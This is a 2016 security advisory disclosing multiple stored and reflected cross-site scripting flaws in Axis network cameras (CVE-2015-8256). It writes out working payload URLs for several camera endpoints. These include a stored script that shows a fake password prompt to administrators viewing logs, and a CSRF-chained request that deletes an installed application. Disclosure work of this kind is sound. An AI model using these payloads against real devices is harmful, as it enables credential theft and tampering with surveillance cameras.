1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
_ _ _ _ | | | | | | ____ _________| | | | __ _| |_____ / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| 6079 Smith W | (_) | | \ VV /__/ | | | (_| | |_) \__ \ doubleplusungood \___/|_|\_/\_/ \___|_|_|_|\__,_|_.__/|___/ owning some telescreens... Security Adivisory 2016-04-09 www.orwelllabs.com twt:@orwelllabs I. ADVISORY INFORMATION ----------------------- Title: Axis Network Cameras Multiple Cross-site scripting Vendor: Axis Communications Class: Improper Input Validation [CWE-20] CVE Name: CVE-2015-8256 Remotely Exploitable: Yes Locally Exploitable: No OLSA-ID: OLSA-2015-8256 Adivisory URL: http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html II. Background -------------- Axis is the market leader in network video, invented the world’s first network camera back in 1996 and we’ve been innovators in video surveillance ever since. Axis network video products are installed in public places and areas such as retail chains, airports, trains, motorways, universities, prisons, casinos and banks. III. vulnerability ------------------ AXIS Network Cameras are prone to multiple (stored/reflected) cross-site scripting vulnerability. IV. technical details --------------------- These attack vectors allow you to execute an arbitrary javascript code in the user browser (session) with this steps: # 1 Attacker injects a javascript payload in the vulnerable page: http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script type="text/javascript>prompt("AXIS_PASSWORD:")</script> This will create a entry in the genneral log file (/var/log/messages) So, when the user is viewing the log 'system options' -> 'support' -> 'Logs & Reports': http://{axishost}/axis-cgi/admin/systemlog.cgi?id will be displayed a prompt for the password of the current user ('AXIS_PASSWORD'). However, due to CSRF presented is even possible to perform all actions already presented: create, edit and remove users and applications, etc. For example, to delete an application "axis_update" via SXSS: http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http:// axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script> * A reflected cross-site scripting affects all models of AXIS devices on the same parameter: http:// {axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!-- # Other Vectors http:// {axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="https://www.exploit-db.com/exploits/39683/xs" onerror=alert(7) /><!-- http:// {axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script> http:// {axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E http:// {axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script> # SCRIPTPATHS: {HTMLROOT}/showReport.shtml {HTMLROOT}/config.shtml {HTMLROOT}/incl/top_incl.shtml {HTMLROOT}/incl/popup_header.shtml {HTMLROOT}/incl/page_header.shtml {HTMLROOT}/incl/top_incl_popup.shtml {HTMLROOT}/viewAreas.shtml {HTMLROOT}/vmd.shtml {HTMLROOT}/custom_whiteBalance.shtml {HTMLROOT}/playWindow.shtml {HTMLROOT}/incl/ptz_incl.shtml {HTMLROOT}/view.shtml {HTMLROOT}/streampreview.shtml And many, many others... V. Impact --------- allows to run arbitrary code on a victim's browser and computer if combined with another flaws in the same devices. VI. Affected products --------------------- Multiple Axis Network products. VII. solution ------------- It was not provided any solution to the problem. VIII. Credits ------------- The vulnerability has been discovered by SmithW from OrwellLabs IX. Legal Notices ----------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. X. Vendor solutions and workarounds ----------------------------------- There was no response from the vendor. About Orwelllabs ++++++++++++++++ Orwelllabs is a (doubleplusungood) security research lab interested in embedded device & webapp hacking. |